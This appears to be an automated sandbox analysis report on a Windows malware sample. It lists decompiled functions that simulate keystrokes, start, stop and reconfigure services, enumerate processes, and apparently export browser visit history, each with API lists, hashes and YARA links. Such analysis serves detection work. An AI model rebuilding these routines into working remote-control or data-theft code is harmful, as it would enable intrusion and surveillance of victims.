                                  • Opcode ID: 56c00de6d7886fd817b9d7ef9925f039a649f4dd6b432ad64e9b8e8786693fde
                                  • Instruction ID: 054b4bc7c437e62fba5109071e9382fc7819d51c50d88b2d3918446dea0eff9a
                                  • Opcode Fuzzy Hash: 56c00de6d7886fd817b9d7ef9925f039a649f4dd6b432ad64e9b8e8786693fde
                                  • Instruction Fuzzy Hash: 7701F575600A04AFD710BB69DC898FFBBACEE85240340497FE84293241D779AD458FA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00410440, Relevance: 12.1, APIs: 8, Instructions: 86keyboardCOMMON
                                  Download Yara Rule
                                  APIs
                                  • SendInput.USER32(00000001,0041021D,0000001C,?,?,00000000,0041021D), ref: 0041046B
                                  • SendInput.USER32(00000001,0041021D,0000001C,?,?,00000000,0041021D), ref: 00410483
                                  • SendInput.USER32(00000001,0041021D,0000001C,?,?,00000000,0041021D), ref: 0041049B
                                  • SendInput.USER32(00000001,0041021D,0000001C,?,?,00000000,0041021D), ref: 004104B0
                                  • SendInput.USER32(00000001,0041021D,0000001C,?,?,00000000,0041021D), ref: 004104C3
                                  • SendInput.USER32(00000001,0041021D,0000001C,?,?,00000000,0041021D), ref: 004104DA
                                  • SendInput.USER32(00000001,0041021D,0000001C,?,?,00000000,0041021D), ref: 004104F1
                                  • SendInput.USER32(00000001,0041021D,0000001C,?,?,00000000,0041021D), ref: 00410508
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: InputSend
                                  • String ID:
                                  • API String ID: 3431551938-0
                                  • Opcode ID: 64c49b0a3cb83d2657ffcb26cf9337e97bedcfabef8349bdbe6acd24d5a92541
                                  • Instruction ID: b328bb317d865897fc6c08efdded885432bfecfaa75727484ced0e6d4c13fc0d
                                  • Opcode Fuzzy Hash: 64c49b0a3cb83d2657ffcb26cf9337e97bedcfabef8349bdbe6acd24d5a92541
                                  • Instruction Fuzzy Hash: F03121B1D5124EA9EB11EF949981FFFBFBCAF18301F504026E640B6142D3B446859BE6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041000F, Relevance: 12.1, APIs: 8, Instructions: 81COMMON
                                  Download Yara Rule
                                  APIs
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00410020
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,0041623C), ref: 00410095
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004100A0
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004100AC
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004100B5
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004100BE
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004100F5
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004100FE
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$G@std@@U?$char_traits@$G@2@@std@@$??0?$basic_string@??1?$basic_string@$G@1@@V01@@$G@2@@0@Hstd@@V01@V10@V?$basic_string@Y?$basic_string@
                                  • String ID:
                                  • API String ID: 2253030544-0
                                  • Opcode ID: eb84855e3950ea35a9c7bfda1fc650b5d2b847637b3ce86eaa20f1cf7d9f2166
                                  • Instruction ID: 1aed4e64735882a0db0bb71c951f021fa06bcdcdb304fa8f35c3d61367e112a6
                                  • Opcode Fuzzy Hash: eb84855e3950ea35a9c7bfda1fc650b5d2b847637b3ce86eaa20f1cf7d9f2166
                                  • Instruction Fuzzy Hash: DE21DA7290111EEBDB509BA1DC88EEFBF7CEF19345F004166F50AE2050EB749689CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00411927, Relevance: 12.1, APIs: 8, Instructions: 64serviceCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 48%
                                  			E00411927(void* _a4, signed char _a20) {
				short* _t6;
				signed int _t9;
				void* _t14;
				short* _t17;
				int _t19;
				void* _t21;
				void* _t22;

				_t17 = 0;
				_t6 = OpenSCManagerW(0, 0, 2);
				_t22 = _t6;
				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
				_t21 = OpenServiceW(_t22, _t6, 2);
				if(_t21 != 0) {
					_t19 =  &_a4 | 0xffffffff;
					_t9 = _a20 & 0x000000ff;
					if(_t9 == 0) {
						_push(4);
						goto L8;
					} else {
						_t14 = _t9 - 1;
						if(_t14 == 0) {
							_push(2);
							goto L8;
						} else {
							if(_t14 == 1) {
								_push(3);
								L8:
								_pop(_t19);
							}
						}
					}
					_t17 = _t17 & 0xffffff00 | ChangeServiceConfigW(_t21, 0xffffffff, _t19, 0xffffffff, _t17, _t17, _t17, _t17, _t17, _t17, _t17) != 0x00000000;
					CloseServiceHandle(_t22);
					CloseServiceHandle(_t21);
				} else {
					CloseServiceHandle(_t22);
				}
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				return _t17;
			}










                                  0x0041192d
                                  0x00411933
                                  0x0041193e
                                  0x00411940
                                  0x0041194e
                                  0x00411952
                                  0x00411961
                                  0x00411964
                                  0x00411966
                                  0x00411976
                                  0x00000000
                                  0x00411968
                                  0x00411968
                                  0x00411969
                                  0x00411972
                                  0x00000000
                                  0x0041196b
                                  0x0041196c
                                  0x0041196e
                                  0x00411978
                                  0x00411978
                                  0x00411978
                                  0x0041196c
                                  0x00411969
                                  0x00411995
                                  0x00411998
                                  0x0041199b
                                  0x00411954
                                  0x00411955
                                  0x00411955
                                  0x004119a0
                                  0x004119ac

                                  APIs
                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,0041B310,?,?,00410FD9), ref: 00411933
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000002,?,?,00410FD9), ref: 00411940
                                  • OpenServiceW.ADVAPI32(00000000,00000000,?,?,00410FD9), ref: 00411948
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,00410FD9), ref: 00411955
                                  • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00410FD9), ref: 00411986
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,00410FD9), ref: 00411998
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,00410FD9), ref: 0041199B
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,00410FD9), ref: 004119A0
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Service$CloseHandle$G@2@@std@@G@std@@OpenU?$char_traits@V?$allocator@$??1?$basic_string@?c_str@?$basic_string@ChangeConfigManager
                                  • String ID:
                                  • API String ID: 760094045-0
                                  • Opcode ID: 68ba0aa1ba6e0b63eb6d3d48f3e20857e4095fce90bd2a8d358d3e5e3e14f0d4
                                  • Instruction ID: c2fa0ded83cb97236bb08be5de2499f982cdcb79c4471a71361dcbc3e7912862
                                  • Opcode Fuzzy Hash: 68ba0aa1ba6e0b63eb6d3d48f3e20857e4095fce90bd2a8d358d3e5e3e14f0d4
                                  • Instruction Fuzzy Hash: 2201D2B1120528BAE6001B709C99EFB3F5CEF453B0B044226F632961E0CA644D81C9E9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00401A5E, Relevance: 12.1, APIs: 8, Instructions: 62COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 28%
                                  			E00401A5E(intOrPtr* __eax, void* __eflags, void* _a8) {
				char _v20;
				char _v36;
				void* _t18;
				void* _t20;
				intOrPtr _t39;

				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				_t39 =  *__eax;
				__imp__?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z();
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
				E004129EB(__eflags,  &_v20,  &_v36, 0x41b310,  &_v36, 4,  *__imp__?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB);
				_t18 = _t39 - 0x9b;
				if(_t18 == 0) {
					__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(E0040180C( &_v20, __eflags, 1));
					 *0x41b288 = 1;
					_t20 = E0040180C( &_v20, __eflags, 0);
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
					E004020C2(0x41b240, 0x9c, _t20);
				} else {
					if(_t18 == 0) {
						E00401B26();
					}
				}
				E004017DD( &_v20);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return 0;
			}








                                  0x00401a68
                                  0x00401a6e
                                  0x00401a80
                                  0x00401a90
                                  0x00401a9f
                                  0x00401aa9
                                  0x00401ab3
                                  0x00401ab8
                                  0x00401ad5
                                  0x00401ae0
                                  0x00401ae7
                                  0x00401af2
                                  0x00401b02
                                  0x00401aba
                                  0x00401abc
                                  0x00401abe
                                  0x00401abe
                                  0x00401abc
                                  0x00401b0a
                                  0x00401b12
                                  0x00401b1b
                                  0x00401b25

                                  APIs
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00401A68
                                  • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,6B015DF0), ref: 00401A80
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 00401A90
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00401A9F
                                    • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                    • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                    • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                    • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,00000001), ref: 00401AD5
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 00401AF2
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000009C), ref: 00401B12
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401B1B
                                    • Part of subcall function 00401B26: GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00401B3E
                                    • Part of subcall function 00401B26: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00401B4B
                                    • Part of subcall function 00401B26: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00401B5D
                                    • Part of subcall function 00401B26: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401B75
                                    • Part of subcall function 00401B26: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00401B80
                                    • Part of subcall function 00401B26: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60( /sort "Visit Time" /stext ",?,?,00415628,00000000), ref: 00401B9C
                                    • Part of subcall function 00401B26: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 00401BAE
                                    • Part of subcall function 00401B26: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401BBB
                                    • Part of subcall function 00401B26: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00401BC8
                                    • Part of subcall function 00401B26: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00401BD2
                                    • Part of subcall function 00401B26: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00401BE3
                                    • Part of subcall function 00401B26: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00401BEC
                                    • Part of subcall function 00401B26: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00401BF5
                                    • Part of subcall function 00401B26: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00401BFE
                                    • Part of subcall function 00401B26: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 00401C0D
                                    • Part of subcall function 00401B26: Sleep.KERNEL32(000000FA), ref: 00401C24
                                    • Part of subcall function 00401B26: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(0000009D), ref: 00401C35
                                    • Part of subcall function 00401B26: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401C3E
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$??1?$basic_string@$G@std@@$G@2@@std@@$??0?$basic_string@$?c_str@?$basic_string@V01@@$?length@?$basic_string@G@2@@0@Hstd@@V12@V?$basic_string@$??4?$basic_string@?substr@?$basic_string@D@1@@V01@$?find@?$basic_string@FileG@1@@ModuleNameSleepV10@V10@0@V10@@
                                  • String ID:
                                  • API String ID: 573486607-0
                                  • Opcode ID: 0444dc97c48bc4e2f82eff9e350e899fd224b97dfb04b76e2a9bcbee0c6a45e8
                                  • Instruction ID: 745551a8169cf10c7f688d11d93f95233c425957d6d772b9d422287574ec9151
                                  • Opcode Fuzzy Hash: 0444dc97c48bc4e2f82eff9e350e899fd224b97dfb04b76e2a9bcbee0c6a45e8
                                  • Instruction Fuzzy Hash: 2D11A23160060DDBCB04FBA5DD5AAEE3778EB48304F008439F912A72E1EF785544CBA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00411859, Relevance: 12.0, APIs: 8, Instructions: 44serviceCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 68%
                                  			E00411859(void* _a4) {
				struct _SERVICE_STATUS _v32;
				short* _t6;
				signed int _t14;
				void* _t17;
				void* _t18;

				_t14 = 0;
				_t6 = OpenSCManagerW(0, 0, 0x40);
				_t18 = _t6;
				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
				_t17 = OpenServiceW(_t18, _t6, 0x40);
				if(_t17 != 0) {
					_t14 = 0 | ControlService(_t17, 2,  &_v32) != 0x00000000;
					CloseServiceHandle(_t18);
					CloseServiceHandle(_t17);
				} else {
					CloseServiceHandle(_t18);
				}
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				return _t14;
			}








                                  0x00411862
                                  0x00411868
                                  0x00411873
                                  0x00411875
                                  0x00411883
                                  0x00411887
                                  0x004118a8
                                  0x004118ab
                                  0x004118ae
                                  0x00411889
                                  0x0041188a
                                  0x0041188a
                                  0x004118b3
                                  0x004118bf

                                  APIs
                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,0041B310,?,?,?,?,?,?,?,004111F9), ref: 00411868
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000040,?,?,?,?,?,?,?,004111F9), ref: 00411875
                                  • OpenServiceW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,004111F9), ref: 0041187D
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,004111F9), ref: 0041188A
                                  • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,?,004111F9), ref: 00411899
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,004111F9), ref: 004118AB
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,004111F9), ref: 004118AE
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,004111F9), ref: 004118B3
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Service$CloseHandle$G@2@@std@@G@std@@OpenU?$char_traits@V?$allocator@$??1?$basic_string@?c_str@?$basic_string@ControlManager
                                  • String ID:
                                  • API String ID: 858787766-0
                                  • Opcode ID: cb019a389b407e0f39cc257e6cab2f96e1b8a4e5817695bb663befdd35136c94
                                  • Instruction ID: 456a524f7c11b696f934a25de41654fa22df35ab19f263cd8204020f404e56b2
                                  • Opcode Fuzzy Hash: cb019a389b407e0f39cc257e6cab2f96e1b8a4e5817695bb663befdd35136c94
                                  • Instruction Fuzzy Hash: 39F04471510518EFD3107FB4AC89EFF3F6CDF89790B448025FA0692150D7749D468AE9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004118C0, Relevance: 12.0, APIs: 8, Instructions: 44serviceCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 68%
                                  			E004118C0(void* _a4) {
				struct _SERVICE_STATUS _v32;
				short* _t6;
				signed int _t14;
				void* _t17;
				void* _t18;

				_t14 = 0;
				_t6 = OpenSCManagerW(0, 0, 0x40);
				_t18 = _t6;
				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
				_t17 = OpenServiceW(_t18, _t6, 0x40);
				if(_t17 != 0) {
					_t14 = 0 | ControlService(_t17, 3,  &_v32) != 0x00000000;
					CloseServiceHandle(_t18);
					CloseServiceHandle(_t17);
				} else {
					CloseServiceHandle(_t18);
				}
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				return _t14;
			}








                                  0x004118c9
                                  0x004118cf
                                  0x004118da
                                  0x004118dc
                                  0x004118ea
                                  0x004118ee
                                  0x0041190f
                                  0x00411912
                                  0x00411915
                                  0x004118f0
                                  0x004118f1
                                  0x004118f1
                                  0x0041191a
                                  0x00411926

                                  APIs
                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,0041B310,?,?,?,?,?,?,?,00411168), ref: 004118CF
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000040,?,?,?,?,?,?,?,00411168), ref: 004118DC
                                  • OpenServiceW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00411168), ref: 004118E4
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,00411168), ref: 004118F1
                                  • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,?,00411168), ref: 00411900
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,00411168), ref: 00411912
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,00411168), ref: 00411915
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00411168), ref: 0041191A
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Service$CloseHandle$G@2@@std@@G@std@@OpenU?$char_traits@V?$allocator@$??1?$basic_string@?c_str@?$basic_string@ControlManager
                                  • String ID:
                                  • API String ID: 858787766-0
                                  • Opcode ID: b8c97e63606c52034d353a1b2137b25ccf4b96d28f39b7d99feda07d95563afa
                                  • Instruction ID: 16193dc10f2cd34b32417e23f1564050492aa2af447f1f1bdc9e6cf5e8b33254
                                  • Opcode Fuzzy Hash: b8c97e63606c52034d353a1b2137b25ccf4b96d28f39b7d99feda07d95563afa
                                  • Instruction Fuzzy Hash: D7F04471510518EFD7106FB4EC88DEF3F6CDF89750B444025FA0692150DB749E458AE9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00411760, Relevance: 12.0, APIs: 8, Instructions: 44serviceCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 68%
                                  			E00411760(void* _a4) {
				struct _SERVICE_STATUS _v32;
				short* _t6;
				signed int _t14;
				void* _t17;
				void* _t18;

				_t14 = 0;
				_t6 = OpenSCManagerW(0, 0, 0x20);
				_t18 = _t6;
				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
				_t17 = OpenServiceW(_t18, _t6, 0x20);
				if(_t17 != 0) {
					_t14 = 0 | ControlService(_t17, 1,  &_v32) != 0x00000000;
					CloseServiceHandle(_t18);
					CloseServiceHandle(_t17);
				} else {
					CloseServiceHandle(_t18);
				}
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				return _t14;
			}








                                  0x00411769
                                  0x0041176f
                                  0x0041177a
                                  0x0041177c
                                  0x0041178a
                                  0x0041178e
                                  0x004117af
                                  0x004117b2
                                  0x004117b5
                                  0x00411790
                                  0x00411791
                                  0x00411791
                                  0x004117ba
                                  0x004117c6

                                  APIs
                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,0041B310,?,?,?,?,?,?,?,00411280), ref: 0041176F
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000020,?,?,?,?,?,?,?,00411280), ref: 0041177C
                                  • OpenServiceW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00411280), ref: 00411784
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,00411280), ref: 00411791
                                  • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,?,00411280), ref: 004117A0
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,00411280), ref: 004117B2
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,00411280), ref: 004117B5
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00411280), ref: 004117BA
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Service$CloseHandle$G@2@@std@@G@std@@OpenU?$char_traits@V?$allocator@$??1?$basic_string@?c_str@?$basic_string@ControlManager
                                  • String ID:
                                  • API String ID: 858787766-0
                                  • Opcode ID: f8fd2a6c5f299153eb193c66ec477f5c61babc6e911454b5a8d4cefe462bdfda
                                  • Instruction ID: b89de82e4dcd107d12e5f2e386de490b738cfb46e6195f9b9e1884d6b0831d1c
                                  • Opcode Fuzzy Hash: f8fd2a6c5f299153eb193c66ec477f5c61babc6e911454b5a8d4cefe462bdfda
                                  • Instruction Fuzzy Hash: 23F0AF71100618EFD3106FB4AC88EFF3F6CEF89390B044025FA06921A0DB648D468AE9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040D761, Relevance: 12.0, APIs: 8, Instructions: 44COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 43%
                                  			E0040D761(void* __ecx, void* __eflags) {
				void* _t15;
				void* _t20;
				void* _t30;
				void* _t32;
				void* _t34;
				void* _t38;

				_t38 = __eflags;
				_t20 = __ecx;
				__imp___itoa(GetCurrentProcessId(), _t32 - 0x30, 0xa);
				_t15 = _t32 - 0x60;
				L00414140();
				L00414170();
				E004020C2(0x41be70, 0x4f, _t34);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t15, _t15, E00409EAA(_t38, _t32 - 0x150), _t30, _t32 - 0x30, _t20);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				E004017DD(_t32 - 0x10);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return 0;
			}









                                  0x0040d761
                                  0x0040d761
                                  0x0040d76e
                                  0x0040d78a
                                  0x0040d78e
                                  0x0040d798
                                  0x0040d7a7
                                  0x0040d7af
                                  0x0040e69b
                                  0x0040e6a4
                                  0x0040e6ac
                                  0x0040e6b5
                                  0x0040e6c1

                                  APIs
                                  • GetCurrentProcessId.KERNEL32(?,0000000A), ref: 0040D767
                                  • _itoa.MSVCRT ref: 0040D76E
                                    • Part of subcall function 00409EAA: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00409EBB
                                    • Part of subcall function 00409EAA: CreateToolhelp32Snapshot.KERNEL32 ref: 00409ECF
                                    • Part of subcall function 00409EAA: Process32FirstW.KERNEL32(00000000,?), ref: 00409EF0
                                    • Part of subcall function 00409EAA: Process32NextW.KERNEL32(00000000,0000022C), ref: 00409EFD
